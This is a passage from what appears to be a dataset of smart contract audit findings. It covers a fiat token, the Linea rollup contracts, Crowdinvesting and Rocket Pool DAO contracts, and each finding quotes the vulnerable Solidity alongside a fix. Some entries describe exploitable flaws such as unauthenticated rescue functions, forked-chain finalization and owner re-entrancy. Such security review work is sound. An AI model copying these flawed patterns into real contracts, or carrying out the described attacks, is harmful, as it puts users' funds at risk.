upgrading script, private key is used to broadcast the transaction, this would expose private key of the deployer and upgrader account on the machine running the script, therefore compromising these accounts.\\n```\\nuint256 deployerPrivateKey = vm.envUint(\"PRIVATE\\_KEY\");\\n```\\n\\n```\\nuint256 deployerPrivateKey = vm.envUint(\"PRIVATE\\_KEY\");\\nvm.startBroadcast(deployerPrivateKey);\\n```\\nчHave Forge sending a raw transaction to the cold wallet of the account, the wallet signs the transaction then return the signed transactions to Forge and broadcaster. Alternatively use different wallet for deployment and upgrade and stop using the wallet after the script is completeчч```\\nuint256 deployerPrivateKey = vm.envUint(\"PRIVATE\\_KEY\");\\n```\\n -Critical Functions Are Public and Without Access ControlчmediumчCritical functions in RescuableV1(rescue) and `BlacklistableV1` `(blacklist,unblacklist)` are public and unauthenticated, any one can call these function to steal funds and blacklist other accounts. Although the child contract `FiatTokenV1` has authenticated the overridden functions and protected them from public access, other contracts inheriting `RescuableV1` and `BlacklistableV1` might have risks from the unauthenticated public functions\\n```\\nfunction rescue(IERC20 token, address to, uint256 amount) public virtual {\\n```\\n\\n```\\nfunction blacklist(address account) public virtual {\\n \\_blacklisted[account] = true;\\n emit Blacklisted(account);\\n}\\n\\n/\\*\\*\\n \\* @dev Removes account from blacklist\\n \\* @param account The address to remove from the blacklist\\n \\*/\\nfunction unBlacklist(address account) public virtual {\\n \\_blacklisted[account] = false;\\n emit UnBlacklisted(account);\\n}\\n```\\nчMake these functions internal and in the child contract add correspondent public function with authentication to call the inherited functionsчч```\\nfunction rescue(IERC20 token, address to, uint256 amount) public virtual {\\n```\\n -Unecessary Parent ContractsчlowчContract `BlacklistableV1` and `RescuableV1` extends `ContextUpgradeable` and `ERC20Upgradeable,` which are not used in any of contract functions and are already inherited by the child contract `FiatTokenV1`.\\n```\\nabstract contract BlacklistableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n\\n```\\nabstract contract RescuableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n\\n```\\ncontract FiatTokenV1 is\\n Initializable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20BurnableUpgradeable,\\n AccessControlUpgradeable,\\n ERC20PermitUpgradeable,\\n UUPSUpgradeable,\\n BlacklistableV1,\\n RescuableV1\\n{\\n```\\nчRemove the unnecessary parent contractsчч```\\nabstract contract BlacklistableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n -Redundant _disableInitializers in ConstructorчlowчContract `FiatTokenV1` inherits from contracts `BlacklistableV1` and `RescuableV1`, the two parent contracts both have `_disableInitializers` in their constructors to prevent uninitialized contract being initialized by the attackers, it's not necessary to have `_disableInitializers` in the FiatTokenV1's constructor, which is redundant and inefficient.\\n```\\nconstructor() {\\n \\_disableInitializers();\\n}\\n```\\nчRemove constructor from `FiatTokenV1`чч```\\nconstructor() {\\n \\_disableInitializers();\\n}\\n```\\n -Incorrect Final Block Number Can Be FinalizedчhighчIn the data finalization function `finalizeCompressedBlocksWithProof`, `finalizationData.finalBlockNumber` is the final block number of the compressed block data to be finalized. However, there is no check in the contract or the prover to ensure `finalBlockNumber` is correct when there is no new data submitted in the finalization, i.e., `submissionDataLength == 0` . The prover can submit an incorrect final block number and, as a result, the finalized block number (currentL2BlockNumber) would be incorrect. Consequently, the prover can skip block data in the finalization.\\n```\\ncurrentL2BlockNumber = \\_finalizationData.finalBlockNumber;\\n```\\n\\n```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\nчResolution\\nfixed by adding a recommended check of `finalBlockNumber` matching the last block number of the submitted data in `_finalizeCompressedBlocks` and a check in the prover and adding `finalBlockNumber` and `lastFinalizedBlockNumber` in the public input of the verifier in the finalization in PR-24\\nIn `_finalizeCompressedBlocks`, check if `finalBlockNumber` is equal to the last block number (finalBlockInData) of the last item of submitted block data. Another solution is to have the prover show that finalBlockNumberis correct in the proof by providing the last finalized block number (lastFinalizedBlockNumber) and verify it by adding `finalBlockNumber` and `lastFinalizedBlockNumber` in the public input of the verifier in the finalization.чч```\\ncurrentL2BlockNumber = \\_finalizationData.finalBlockNumber;\\n```\\n -Finalization Fails for the First Batch of Data Submitted After Migration to the Updated ContractчhighчWhen submitting the initial batch of compressed block data after the contract update, the finalization will fail.\\nIn function `_finalizeCompressedBlocks`, `startingDataParentHash = dataParents[_finalizationData.dataHashes[0]]` will be empty and, therefore, `startingParentFinalStateRootHash = dataFinalStateRootHashes[startingDataParentHash]` will be empty too. The check `_finalizationData.parentStateRootHash == stateRootHashes[currentL2BlockNumber]` requires `_finalizationData.parentStateRootHash == _initialStateRootHash`, which is not empty, so the condition `startingParentFinalStateRootHash != _finalizationData.parentStateRootHash` is true, and we revert with the error FinalStateRootHashDoesNotMatch:\\n```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\n\\n```\\nif (finalizationDataDataHashesLength != 0) {\\n bytes32 startingDataParentHash = dataParents[\\_finalizationData.dataHashes[0]];\\n\\n if (startingDataParentHash != \\_finalizationData.dataParentHash) {\\n revert ParentHashesDoesNotMatch(startingDataParentHash, \\_finalizationData.dataParentHash);\\n }\\n\\n bytes32 startingParentFinalStateRootHash = dataFinalStateRootHashes[startingDataParentHash];\\n\\n if (startingParentFinalStateRootHash != \\_finalizationData.parentStateRootHash) {\\n revert FinalStateRootHashDoesNotMatch(startingParentFinalStateRootHash, \\_finalizationData.parentStateRootHash);\\n }\\n```\\nчSet the correct initial value for `dataFinalStateRootHashes` for the initial batch of compressed block data.чч```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\n -Prover Can Censor L2 → L1 Messages Partially AddressedчhighчIn L2 → L1 messaging, messages are grouped and added to a Merkle tree by the prover. During finalization, the operator (coordinator) submits the Merkle root to L1, and the user SDK rebuilds the tree to which the message is added and generates a Merkle proof to claim against the root finalized on L1. However, the prover can skip messages when building the tree. Consequently, the user cannot claim the skipped message, which might result in frozen funds.\\nCurrently, the prover is a single entity owned by Linea. Hence, this would require malice or negligence on Linea's part.\\n```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n\\_anchorL2MessagingBlocks(\\_finalizationData.l2MessagingBlocksOffsets, lastFinalizedBlock);\\n```\\nчDecentralize the prover, so messages can be included by different provers.чч```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n\\_anchorL2MessagingBlocks(\\_finalizationData.l2MessagingBlocksOffsets, lastFinalizedBlock);\\n```\\n -Malicious Operator Might Finalize Data From a Forked Linea ChainчhighчA malicious operator (prover) can add and finalize block data from a forked Linea chain, so transactions on the forked chain can be finalized, causing a loss of funds from the L1.\\nFor example, a malicious operator forks the canonical chain, then the attacker sends the forked chain Ether to L1 with `sendMessage` from the forked L2. The operator then submits the block data to L1 and finalizes it with `finalizeCompressedBlocksWithProof`, using the finalization data and proof from the forked chain. (Note that the malicious prover sets the forked chain `chainId` in its circuit as a constant.) The L1 contract (LineaRollup) doesn't know whether the data and the proof are from the canonical L2 or the forked one. The finalization succeeds, and the attacker can claim the bridged forked chain Ether and steal funds from L1.\\nAs there is currently only one operator and it is owned by the Linea team, this kind of attack is unlikely to happen. However, when the operator and the coordinator are decentralized, the likelihood of this attack increases.\\n```\\nuint256 publicInput = uint256(\\n keccak256(\\n abi.encode(\\n shnarf,\\n \\_finalizationData.parentStateRootHash,\\n \\_finalizationData.lastFinalizedTimestamp,\\n \\_finalizationData.finalBlockNumber,\\n \\_finalizationData.finalTimestamp,\\n \\_finalizationData.l1RollingHash,\\n \\_finalizationData.l1RollingHashMessageNumber,\\n keccak256(abi.encodePacked(\\_finalizationData.l2MerkleRoots))\\n )\\n```\\n\\n```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n```\\nчAdd `chainId` in the `FinalizationData` as a public input of the verifier function `_verifyProof`, so the proof from the forked Linea chain will not pass the verification because the `chainId` won't match.чч```\\nuint256 publicInput = uint256(\\n keccak256(\\n abi.encode(\\n shnarf,\\n \\_finalizationData.parentStateRootHash,\\n \\_finalizationData.lastFinalizedTimestamp,\\n \\_finalizationData.finalBlockNumber,\\n \\_finalizationData.finalTimestamp,\\n \\_finalizationData.l1RollingHash,\\n \\_finalizationData.l1RollingHashMessageNumber,\\n keccak256(abi.encodePacked(\\_finalizationData.l2MerkleRoots))\\n )\\n```\\n -The Compressed Block Data Is Not Verified Against Data in the Prover During Data Submission AcknowledgedчmediumчWhen the sequencer submits the batched block data with the `submitData` function, it's expected to check that the submitted commitment of the compressed block data `keccak(_submissionData.compressedData)` and the commitment of the block data used in the prover (snarkHash) commit to the same data. This is done by proof of equivalence; the `x` is calculated by hashing `keccak(_submissionData.compressedData)` and `snarkHash`, and `y` is provided by the prover. Then it's verified that `P(x) = y`, where `P` is a polynomial that encodes the compressed data (_submissionData.compressedData). However, in the `submitData` function, `y` is evaluated by `_calculateY` but it is not checked against the `y` provided by the prover. In fact, the prover doesn't provide `y` to the function; instead `x` and `y` are provided to the prover who would evaluate `y'` and compare it with `y` from the contract, then `x` and `y` are included in the public input for the proof verification in the finalization.\\n```\\nshnarf = keccak256(\\n abi.encode(\\n shnarf,\\n _submissionData.snarkHash,\\n _submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n _calculateY(_submissionData.compressedData, compressedDataComputedX)\\n )\\n ); \\n```\\n\\nThe only difference is if the two commitments don't commit to the same block data (meaning the data submitted doesn't match the data used in the prover), `submitData` would fail - while in the current implementation, it would fail in the proof verification during the finalization. As a result, if the data submitted doesn't match the data in the prover in the finalization, the operator has to submit the correct data again in order to finalize it. Linea stated they will verify it in the data submission, once EIP-4844 is implemented.\\n```\\nfunction \\_submitData(SubmissionData calldata \\_submissionData) internal returns (bytes32 shnarf) {\\n shnarf = dataShnarfHashes[\\_submissionData.dataParentHash];\\n\\n bytes32 parentFinalStateRootHash = dataFinalStateRootHashes[\\_submissionData.dataParentHash];\\n uint256 lastFinalizedBlock = currentL2BlockNumber;\\n\\n if (\\_submissionData.firstBlockInData <= lastFinalizedBlock) {\\n revert FirstBlockLessThanOrEqualToLastFinalizedBlock(\\_submissionData.firstBlockInData, lastFinalizedBlock);\\n }\\n\\n if (\\_submissionData.firstBlockInData > \\_submissionData.finalBlockInData) {\\n revert FirstBlockGreaterThanFinalBlock(\\_submissionData.firstBlockInData, \\_submissionData.finalBlockInData);\\n }\\n\\n if (\\_submissionData.parentStateRootHash != parentFinalStateRootHash) {\\n revert StateRootHashInvalid(parentFinalStateRootHash, \\_submissionData.parentStateRootHash);\\n }\\n\\n bytes32 currentDataHash = keccak256(\\_submissionData.compressedData);\\n\\n if (dataFinalStateRootHashes[currentDataHash] != EMPTY\\_HASH) {\\n revert DataAlreadySubmitted(currentDataHash);\\n }\\n\\n dataParents[currentDataHash] = \\_submissionData.dataParentHash;\\n dataFinalStateRootHashes[currentDataHash] = \\_submissionData.finalStateRootHash;\\n\\n bytes32 compressedDataComputedX = keccak256(abi.encode(\\_submissionData.snarkHash, currentDataHash));\\n\\n shnarf = keccak256(\\n abi.encode(\\n shnarf,\\n \\_submissionData.snarkHash,\\n \\_submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n \\_calculateY(\\_submissionData.compressedData, compressedDataComputedX)\\n )\\n );\\n\\n dataShnarfHashes[currentDataHash] = shnarf;\\n\\n emit DataSubmitted(currentDataHash, \\_submissionData.firstBlockInData, \\_submissionData.finalBlockInData);\\n}\\n```\\n\\n```\\nfunction \\_calculateY(\\n bytes calldata \\_data,\\n bytes32 \\_compressedDataComputedX\\n) internal pure returns (bytes32 compressedDataComputedY) {\\n if (\\_data.length % 0x20 != 0) {\\n revert BytesLengthNotMultipleOf32();\\n }\\n\\n bytes4 errorSelector = ILineaRollup.FirstByteIsNotZero.selector;\\n assembly {\\n for {\\n let i := \\_data.length\\n } gt(i, 0) {\\n\\n } {\\n i := sub(i, 0x20)\\n let chunk := calldataload(add(\\_data.offset, i))\\n if iszero(iszero(and(chunk, 0xFF00000000000000000000000000000000000000000000000000000000000000))) {\\n let ptr := mload(0x40)\\n mstore(ptr, errorSelector)\\n revert(ptr, 0x4)\\n }\\n compressedDataComputedY := addmod(\\n mulmod(compressedDataComputedY, \\_compressedDataComputedX, Y\\_MODULUS),\\n chunk,\\n Y\\_MODULUS\\n )\\n }\\n }\\n}\\n```\\nчAdd the compressed block data verification in the `submitData` function.чч```\\nshnarf = keccak256(\\n abi.encode(\\n shnarf,\\n _submissionData.snarkHash,\\n _submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n _calculateY(_submissionData.compressedData, compressedDataComputedX)\\n )\\n ); \\n```\\n -Empty Compressed Data Allowed in Data SubmissionчmediumчIn `submitData`, the coordinator can submit data with empty `compressedData` in `_submissionData`, which is not a desired purpose of this function and may cause undefined system behavior.\\n```\\nfunction submitData(\\n SubmissionData calldata \\_submissionData\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n \\_submitData(\\_submissionData);\\n}\\n```\\nчAdd a check to disallow data submission with empty `compressedData`.чч```\\nfunction submitData(\\n SubmissionData calldata \\_submissionData\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n \\_submitData(\\_submissionData);\\n}\\n```\\n -Limiting the Price in the buy and onTokenTransfer FunctionsчmediumчWhen an investor tries to `buy` the tokens in the `Crowdinvesting` contract, the `buy` function does not allow to limit the amount of tokens that can be spent during this particular transaction:\\n```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n```\\n\\nThe owner of the price oracle can front-run the transaction and twist the price.\\nOf course, the buyer can try to regulate that limit with the token allowance, but there may be some exceptions. Sometimes, users want to give more allowance and buy in multiple transactions over time. Or even give an infinite allowance (not recommended) out of convenience.\\nThe same issue can be found in the `onTokenTransfer` function. This function works differently because the amount of currency is fixed, and the amount of tokens minted is undefined. Because of that, limiting the allowance won't help, so the user doesn't know how many tokens can be bought.чIt's recommended to explicitly limit the amount of tokens that can be transferred from the buyer for the `buy` function. And allow users to define a minimal amount of tokens bought in the `onTokenTransfer` function.чч```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n```\\n -Potential Re-Entrancy Attack in the Crowdinvesting ContractчlowчThe attack requires a set of pre-requisites:\\nThe currency token should have a re-entrancy opportunity inside the token transfer.\\nThe re-entrancy can be done on a token transfer from the `_msgSender()` to the `feeCollector`, so there are not a lot of attackers who can potentially execute it.\\nThe owner should be involved in the attack, so it's most likely an attack by the owner.\\n```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n\\n (uint256 fee, address feeCollector) = \\_getFeeAndFeeReceiver(currencyAmount);\\n if (fee != 0) {\\n currency.safeTransferFrom(\\_msgSender(), feeCollector, fee);\\n }\\n\\n currency.safeTransferFrom(\\_msgSender(), currencyReceiver, currencyAmount - fee);\\n \\_checkAndDeliver(\\_amount, \\_tokenReceiver);\\n\\n emit TokensBought(\\_msgSender(), \\_amount, currencyAmount);\\n}\\n```\\n\\nSo on the token transfer to the `feeCollector` above, the `currency` parameter can be changed by the `owner`. And the following token transfer (currency.safeTransferFrom(_msgSender(), currencyReceiver, currencyAmount - fee);) will be made in a different `currency`.\\nA possible scenario of the attack could look as follows:\\nMalicious owner sells tokens for a valuable currency. People are placing allowance for the tokens.\\nThe owner changes the currency to a new one with a much lower price and re-entrancy during transfer.\\nWhen a victim wants to buy tokens, the owner reenters on fee transfer and returns the old currency.\\nThe victim transfers the updated currency that is more expensive.чSave the currency in memory at the beginning of the function and use it further.чч```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n\\n (uint256 fee, address feeCollector) = \\_getFeeAndFeeReceiver(currencyAmount);\\n if (fee != 0) {\\n currency.safeTransferFrom(\\_msgSender(), feeCollector, fee);\\n }\\n\\n currency.safeTransferFrom(\\_msgSender(), currencyReceiver, currencyAmount - fee);\\n \\_checkAndDeliver(\\_amount, \\_tokenReceiver);\\n\\n emit TokensBought(\\_msgSender(), \\_amount, currencyAmount);\\n}\\n```\\n -Lack of Validation of PrivateOffer Initialization ParametersчlowчThe `PrivateOffer` contract allows to create a customised deal for a specific investor. The `initialize()` function receives parameters to set up the `PrivateOffer` accordingly.\\nThe following parameters lack of validation during initialization:\\n`tokenAmount`\\n`token`\\n`currency`\\n`tokenAmount`\\n```\\nuint256 currencyAmount = Math.ceilDiv(\\n \\_arguments.tokenAmount \\* \\_arguments.tokenPrice,\\n 10 \\*\\* \\_arguments.token.decimals()\\n);\\n```\\n\\n`tokenAmount` is not validated at all. It should be verified to be greater than zero.\\n`token`\\n`token` is not validated at all. It should be verified to be different than zero address.\\n`currency`\\n`currency` is not validated at all. The documentation mentions a restricted list of supported currencies. It should be enforced by checking this parameter against a whitelist of `currency` addresses.чEnhance the validation of the following parameters: `tokenAmount`, `token`, `currency`.чч```\\nuint256 currencyAmount = Math.ceilDiv(\\n \\_arguments.tokenAmount \\* \\_arguments.tokenPrice,\\n 10 \\*\\* \\_arguments.token.decimals()\\n);\\n```\\n -Lack of Validation of Crowdinvesting Initialization ParametersчlowчThe `Crowdinvesting` contract allows everyone who meets the requirements to buy tokens at a fixed price. The `initialize()` function receives parameters to set up the `Crowdinvesting` accordingly.\\nThe following parameters lack of validation during initialization:\\n`tokenPrice`\\n`minAmountPerBuyer`\\n`lastBuyDate`\\n`currency`\\n`tokenPrice`\\n```\\nrequire(\\_arguments.tokenPrice != 0, \"\\_tokenPrice needs to be a non-zero amount\");\\n```\\n\\n`tokenPrice` is checked to be different to zero. It should be verified to be in between `priceMin` and `priceMax` when these parameters are provided.\\n`minAmountPerBuyer`\\n```\\nrequire(\\n \\_arguments.minAmountPerBuyer <= \\_arguments.maxAmountPerBuyer,\\n \"\\_minAmountPerBuyer needs to be smaller or equal to \\_maxAmountPerBuyer\"\\n);\\n```\\n\\n`minAmountPerBuyer` is checked to be below or equal to `maxAmountPerBuyer`. It should be verified to not be zero.\\n`lastBuyDate`\\n```\\nlastBuyDate = \\_arguments.lastBuyDate;\\n```\\n\\n`lastBuyDate` is not validated at all. It should be verified to be greater than the current `block.timestamp`. Currently, a `Crowdinvesting` contract with `lastBuyDate` parameter set to a value (different than zero) below `block.timestamp` will not be able to sell any token.\\n```\\nfunction \\_checkAndDeliver(uint256 \\_amount, address \\_tokenReceiver) internal {\\n require(tokensSold + \\_amount <= maxAmountOfTokenToBeSold, \"Not enough tokens to sell left\");\\n require(tokensBought[\\_tokenReceiver] + \\_amount >= minAmountPerBuyer, \"Buyer needs to buy at least minAmount\");\\n require(\\n tokensBought[\\_tokenReceiver] + \\_amount <= maxAmountPerBuyer,\\n \"Total amount of bought tokens needs to be lower than or equal to maxAmount\"\\n );\\n\\n if (lastBuyDate != 0 && block.timestamp > lastBuyDate) {\\n revert(\"Last buy date has passed: not selling tokens anymore.\");\\n }\\n\\n tokensSold += \\_amount;\\n tokensBought[\\_tokenReceiver] += \\_amount;\\n\\n token.mint(\\_tokenReceiver, \\_amount);\\n}\\n```\\n\\n`currency`\\n```\\nrequire(address(\\_arguments.currency) != address(0), \"currency can not be zero address\");\\n```\\n\\n`currency` is checked to be different than zero. The documentation mentions a restricted list of supported currencies. It should be enforced by checking this parameter against a whitelist of `currency` addresses.чEnhance the validation of the following parameters: `tokenPrice`, `tokenPrice`, `lastBuyDate`, `currency`.чч```\\nrequire(\\_arguments.tokenPrice != 0, \"\\_tokenPrice needs to be a non-zero amount\");\\n```\\n -Missing Events on Important State ChangesчmediumчThroughout the code base, various important settings-related state changes are not surfaced by events.\\nIn RocketDAONodeTrusted:\\n```\\nfunction bootstrapMember(string memory _id, string memory _url, address _nodeAddress) override external onlyGuardian onlyBootstrapMode onlyRegisteredNode(_nodeAddress) onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets add them\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalInvite(_id, _url, _nodeAddress);\\n}\\n\\n\\n// Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n\\n// Bootstrap mode - Bool Setting\\nfunction bootstrapSettingBool(string memory _settingContractName, string memory _settingPath, bool _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalSettingBool(_settingContractName, _settingPath, _value);\\n}\\n```\\n\\nIn RocketDAOProtocol:\\n```\\nfunction bootstrapSettingMulti(string[] memory _settingContractNames, string[] memory _settingPaths, SettingType[] memory _types, bytes[] memory _values) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAOProtocol\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAOProtocolProposalsInterface(getContractAddress(\"rocketDAOProtocolProposals\")).proposalSettingMulti(_settingContractNames, _settingPaths, _types, _values);\\n}\\n\\n/// @notice Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAOProtocol\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAOProtocolProposalsInterface(getContractAddress(\"rocketDAOProtocolProposals\")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n```\\n\\nTreasury address setter:\\n```\\nfunction bootstrapTreasuryNewContract(string memory _contractName, address _recipientAddress, uint256 _amountPerPeriod, uint256 _periodLength, uint256 _startTime, uint256 _numPeriods) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAOProtocol\", address(this)) {\\n RocketDAOProtocolProposalsInterface(getContractAddress(\"rocketDAOProtocolProposals\")).proposalTreasuryNewContract(_contractName, _recipientAddress, _amountPerPeriod, _periodLength, _startTime, _numPeriods);\\n}\\n```\\n\\nBootstrap mode management:\\n```\\nfunction bootstrapDisable(bool _confirmDisableBootstrapMode) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAOProtocol\", address(this)) {\\n require(_confirmDisableBootstrapMode == true, \"You must confirm disabling bootstrap mode, it can only be done once!\");\\n setBool(keccak256(abi.encodePacked(daoNameSpace, \"bootstrapmode.disabled\")), true);\\n}\\n```\\n\\nOne-time treasury spends:\\n```\\nfunction bootstrapSpendTreasury(string memory _invoiceID, address _recipientAddress, uint256 _amount) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAOProtocol\", address(this)) {\\n RocketDAOProtocolProposalsInterface(getContractAddress(\"rocketDAOProtocolProposals\")).proposalTreasuryOneTimeSpend(_invoiceID, _recipientAddress, _amount);\\n}\\n```\\n\\n```\\nfunction setDelegate(address _newDelegate) external override onlyRegisteredNode(msg.sender) {\\n```\\n\\n```\\nfunction proposalSettingUint(string memory _settingNameSpace, string memory _settingPath, uint256 _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalSettingBool(string memory _settingNameSpace, string memory _settingPath, bool _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalSettingAddress(string memory _settingNameSpace, string memory _settingPath, address _value) override public onlyExecutingContracts() onlyValidSetting(_settingNameSpace, _settingPath) {\\n bytes32 namespace = keccak256(abi.encodePacked(protocolDaoSettingNamespace, _settingNameSpace));\\n```\\n\\n```\\nfunction proposalInvite(string calldata _id, address _memberAddress) override public onlyLatestContract(\"rocketDAOProtocolProposals\", msg.sender) {\\n // Their proposal executed, record the block\\n```\\nчResolution\\nThe client implemented a fix in commit `1be41a88a40125baf58d8904770cd9eb9e0732bb` and provided the following statement:\\nRocketDAONodeTrusted is not a contract that is getting upgrade so this won't be fixed\\nRocketDAOProtocol has been updated to include events for each bootstrap function\\nRocketNetworkVoting has been updated to emit an event\\nRocketDAOSecurityProposals has been updated to emit events for all proposals\\nWe recommend emitting events on state changes, particularly when these are performed by an authorized party. The implementation of the recommendation should be analogous to the handling of events on state changes in the rest of the system, such as in the `RocketMinipoolPenalty` contract:\\n```\\nfunction setMaxPenaltyRate(uint256 _rate) external override onlyGuardian {\\n // Update rate\\n maxPenaltyRate = _rate;\\n // Emit event\\n emit MaxPenaltyRateUpdated(_rate, block.timestamp);\\n}\\n```\\nчч```\\nfunction bootstrapMember(string memory _id, string memory _url, address _nodeAddress) override external onlyGuardian onlyBootstrapMode onlyRegisteredNode(_nodeAddress) onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets add them\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalInvite(_id, _url, _nodeAddress);\\n}\\n\\n\\n// Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n\\n// Bootstrap mode - Bool Setting\\nfunction bootstrapSettingBool(string memory _settingContractName, string memory _settingPath, bool _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(\"rocketDAONodeTrusted\", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(\"rocketDAONodeTrustedProposals\")).proposalSettingBool(_settingContractName, _settingPath, _value);\\n}\\n```\\n -RocketDAOProtocolProposal._propose() Should Revert if _blockNumber > block.numberчmediumчCurrently, the `RocketDAOProtocolProposal._propose()` function does not account for scenarios where `_blockNumber` is greater than `block.number`. This is a critical oversight, as voting power cannot be determined for future block numbers.\\n```\\nfunction _propose(string memory _proposalMessage, uint256 _blockNumber, uint256 _totalVotingPower, bytes calldata _payload) internal returns (uint256) {\\n```\\nчWe recommend updating the function to revert on transactions where `_blockNumber` exceeds `block.number`. This will prevent the creation of proposals with undefined voting power and maintain the integrity of the voting process.чч```\\nfunction _propose(string memory _proposalMessage, uint256 _blockNumber, uint256 _totalVotingPower, bytes calldata _payload) internal returns (uint256) {\\n```\\n -Unused Parameter and Improper Parameter Sanitization in RocketNetworkVoting.calculateVotingPower()чlowчThe `matchedETH` parameter in `RocketNetworkVoting.calculateVotingPower()` is unused.\\n```\\n// Get contracts\\nRocketDAOProtocolSettingsNodeInterface rocketDAOProtocolSettingsNode = RocketDAOProtocolSettingsNodeInterface(getContractAddress(\"rocketDAOProtocolSettingsNode\"));\\n```\\n\\nAdditionally, the `_block` parameter is not sanitized. Thus, if calling the function with a block number `_block` where `_block >= block.number`, the call will revert because of a division-by-zero error. Indeed, `rocketNetworkSnapshots.lookupRecent` will return a `rplPrice` of zero since the checkpoint does not exist. Consequently, the function `calculateVotingPower` will revert when computing the `maximumStake`.\\n```\\nkey = keccak256(abi.encodePacked(\"rpl.staked.node.amount\", _nodeAddress));\\nuint256 rplStake = uint256(rocketNetworkSnapshots.lookupRecent(key, uint32(_block), 5));\\n\\nreturn calculateVotingPower(rplStake, ethMatched, ethProvided, rplPrice);\\n```\\n\\n```\\nuint256 maximumStake = providedETH * maximumStakePercent / rplPrice;\\n```\\nчWe recommend removing the unused parameter to enhance code clarity. The presence of unused parameters can lead to potential confusion for future developers. Additionally, we recommend ensuring that the snapshotted `rplPrice` value exists before it is used to compute the `maximumStake` value.чч```\\n// Get contracts\\nRocketDAOProtocolSettingsNodeInterface rocketDAOProtocolSettingsNode = RocketDAOProtocolSettingsNodeInterface(getContractAddress(\"rocketDAOProtocolSettingsNode\"));\\n```\\n -Wrong/Misleading NatSpec 